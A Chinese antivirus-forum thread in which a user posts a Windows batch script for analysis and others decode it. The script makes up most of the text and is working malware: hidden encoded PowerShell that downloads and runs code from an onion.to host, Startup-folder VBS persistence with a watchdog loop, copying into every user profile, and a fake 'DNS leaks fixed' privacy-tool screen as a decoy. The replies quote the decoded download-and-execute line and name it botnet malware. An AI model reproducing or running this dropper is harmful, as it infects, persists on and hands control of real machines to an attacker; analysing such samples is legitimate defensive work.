查看: 2706|回复: 10
收起左侧

[软件] 有人能分析一下这些代码吗?

[复制链接]
418634392
发表于 2017-9-12 21:21:21 | 显示全部楼层 |阅读模式
@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (
        powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA==)
if %PROCESSOR_ARCHITECTURE%==AMD64 (
        %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== )


@echo @echo off > "%USERPROFILE%\appdata\file.bat"
@echo if %%PROCESSOR_ARCHITECTURE%%==x86 ( START /B powershell -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) >> "%USERPROFILE%\appdata\file.bat"
@echo if %%PROCESSOR_ARCHITECTURE%%==AMD64( START /B %%WinDir%%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcABzADoALwAvAGwAYwAyADUAcQBqADIAZwBkAGMAYQBpAGQAYQByAGMALgBvAG4AaQBvAG4ALgB0AG8AOgA0ADQAMwAvAEwAZQBUAHIAVwBIAHoASQBxACIAKQAKAA== ) >> "%USERPROFILE%\appdata\file.bat"

SET sfpath=AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

SET sfpathall=%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup

echo Dim WinScriptHost > "%USERPROFILE%\%sfpath%\config.vbs"
echo WScript.Sleep(30000) >> "%USERPROFILE%\%sfpath%\config.vbs"
echo Set WinScriptHost = CreateObject("WScript.Shell") >> "%USERPROFILE%\%sfpath%\config.vbs"
echo WinScriptHost.Run Chr(34) ^& "%%USERPROFILE%%\appdata\file.bat" ^& Chr(34)^, 0 >> "%USERPROFILE%\%sfpath%\config.vbs"
echo While True >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        set service = GetObject ("winmgmts:") >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        running = 0 >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        for each Process in Service.InstancesOf ("Win32_Process") >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                If Process.Name = "powershell.exe" then >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                        running = running + 1 >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                        End If >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        next >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        If running ^< 1 then >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                WinScriptHost.Run Chr(34) ^& "%%USERPROFILE%%\appdata\file.bat" ^& Chr(34)^, 0 >> "%USERPROFILE%\%sfpath%\config.vbs"
echo                End If >> "%USERPROFILE%\%sfpath%\config.vbs"
echo        WScript.Sleep(120000) >> "%USERPROFILE%\%sfpath%\config.vbs"
echo Wend >> "%USERPROFILE%\%sfpath%\config.vbs"
echo Set WinScriptHost = Nothing >> "%USERPROFILE%\%sfpath%\config.vbs"

START /B wscript.exe "%USERPROFILE%\%sfpath%\config.vbs"

cd %USERPROFILE%
cd ..
for /d %%f in (*) do (
        START /B cmd.exe copy "%USERPROFILE%\appdata\file.bat" "%%~ff\appdata\file.bat"
        START /B cmd.exe copy "%USERPROFILE%\%sfpath%\config.vbs" "%%~ff\%sfpath%\config.vbs"
        )

START /B cmd.exe copy "%USERPROFILE%\%sfpath%\config.vbs" "%sfpathall%\config.vbs"

echo Wscript.Sleep 3000 > "%userprofile%\appdata\sleep.vbs"
REM cls
REM :A
REM color 0a
REM cls
echo Starting Privacy Tools...
start /w wscript.exe "%userprofile%\appdata\sleep.vbs"
echo:
echo:
echo:
echo Checking for DNS leaks...
start /w wscript.exe "%userprofile%\appdata\sleep.vbs"
echo:
echo:
echo:
echo DNS leaks fixed!
start /w wscript.exe "%userprofile%\appdata\sleep.vbs"
echo:
echo:
echo:
echo:

set /p DUMMY=Hit ENTER to continue...

del "%userprofile%\appdata\sleep.vbs"
随便注册
发表于 2017-9-12 22:20:36 | 显示全部楼层
本帖最后由 随便注册 于 2017-9-13 02:34 编辑

https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq下载代码写入file.bat,然后是两个vbs看不懂,还有添加自启动什么的
  1. [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  2. iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")
复制代码


打不开了,换了个域名https://lc25qj2gdcaidarc.onion.link/LeTrWHzIq,如果不是巧合
就是一个base64接着一个base64
最终得到一个gzip,里面文件跟乱码似的
  1. # Powerfun - Written by Ben Turner & Dave Hardy

  2. function Get-Webclient
  3. {
  4.     $wc = New-Object -TypeName Net.WebClient
  5.     $wc.UseDefaultCredentials = $true
  6.     $wc.Proxy.Credentials = $wc.Credentials
  7.     $wc
  8. }
  9. ……
复制代码




有个ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com,不知道为什么查是电信的

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
nazisoft
发表于 2017-9-18 21:50:10 | 显示全部楼层
搞加密字符串的,不是什么好东西
snoshowtime
发表于 2017-9-26 16:06:13 | 显示全部楼层
看不明白,坐等大神解答!
LeonTheCracker
发表于 2018-4-7 21:47:23 | 显示全部楼层
楼主大大,这个是你从lc25qj2gdcaidarc.onion那个暗网网站里搞来CrackBook.bat吧,我也研究这个脚本一些时间了,这是个僵尸网络病毒,管理僵尸网络的那个黑客IP可能被我反跟踪到了,是个印度尼西亚人,185.100.85.150,你可以跟我一起详细研究研究(老号丢了,一个新号)
418634392
 楼主| 发表于 2018-4-9 01:23:16 | 显示全部楼层
LeonTheCracker 发表于 2018-4-7 21:47
楼主大大,这个是你从lc25qj2gdcaidarc.onion那个暗网网站里搞来CrackBook.bat吧,我也研究这个脚本一些时 ...

LeonTheCracker
头像被屏蔽
发表于 2018-4-9 20:14:29 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
cnseatech
发表于 2018-4-9 22:36:47 | 显示全部楼层
加密字符的,应该有不良企图的
wyoven
发表于 2018-4-10 08:24:44 | 显示全部楼层
了解一下
LeonTheCracker
发表于 2018-4-14 18:49:50 | 显示全部楼层
IP是假的,onion.to都是这个IP
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-25 19:31 , Processed in 0.131235 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表